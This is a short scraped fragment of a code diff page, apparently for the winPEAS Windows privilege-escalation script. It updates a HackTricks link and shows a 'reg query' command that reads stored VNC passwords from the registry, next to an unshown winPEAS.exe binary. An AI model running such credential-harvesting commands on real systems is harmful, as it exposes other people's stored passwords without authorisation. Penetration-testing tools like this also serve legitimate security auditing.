ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
|
||||||
ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
|
ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
|
||||||
reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
|
reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
|
||||||
CALL :T_Progress 2
|
CALL :T_Progress 2
|
||||||
|
BIN
win/winPEAS.exe
BIN
win/winPEAS.exe
Binary file not shown.
Binary file not shown.
Loading…
Reference in New Issue
Block a user